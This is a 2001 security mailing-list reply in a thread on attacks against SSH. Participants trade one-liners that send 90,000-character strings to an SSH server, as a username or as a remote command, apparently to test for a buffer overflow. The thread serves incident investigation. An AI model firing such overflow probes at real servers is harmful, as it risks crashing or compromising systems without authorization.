Re: Attacks against SSH?

From: Skip Carter (skip@taygeta.com)
Date: 12/05/01


To: Russell Fulton <r.fulton@auckland.ac.nz>
Date: Wed, 05 Dec 2001 14:31:58 -0800
From: Skip Carter <skip@taygeta.com>


> bluebottle:~ >sh
> $ ssh -l`perl -e '{print "A"x90000}'`130.216.1.228
> Usage: ssh [options] host [command]
> Options:
> -l user Log in using this user name.
> -n Redirect input from /dev/null.
> -A Enable authentication agent forwarding.
> -a Disable authentication agent forwarding.
>
>
> Now we now get a usage error from the local ssh client. Which ssh
> client were you using Michal?

  With Openssh 2.9.9, the following works:

  ssh -v <hostname> perl -e '{print "A"x90000}'

-- 
 Dr. Everett (Skip) Carter      Phone: 831-641-0645 FAX:  831-641-0647
 Taygeta Scientific Inc.        INTERNET: skip@taygeta.com
 1340 Munras Ave., Suite 314    WWW: http://www.taygeta.com
 Monterey, CA. 93940            

---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com



Relevant Pages

  • Re: Attacks against SSH?
    ... >> -l user Log in using this user name. ... >> Now we now get a usage error from the local ssh client. ... The orignal command is correct if a space is added before ...
    (Incidents)
  • Re: Attacks against SSH?
    ... -l user Log in using this user name. ... Now we now get a usage error from the local ssh client. ...
    (Incidents)
  • Re: Attacks against SSH?
    ... > hmmm... ... > Now we now get a usage error from the local ssh client. ...
    (Incidents)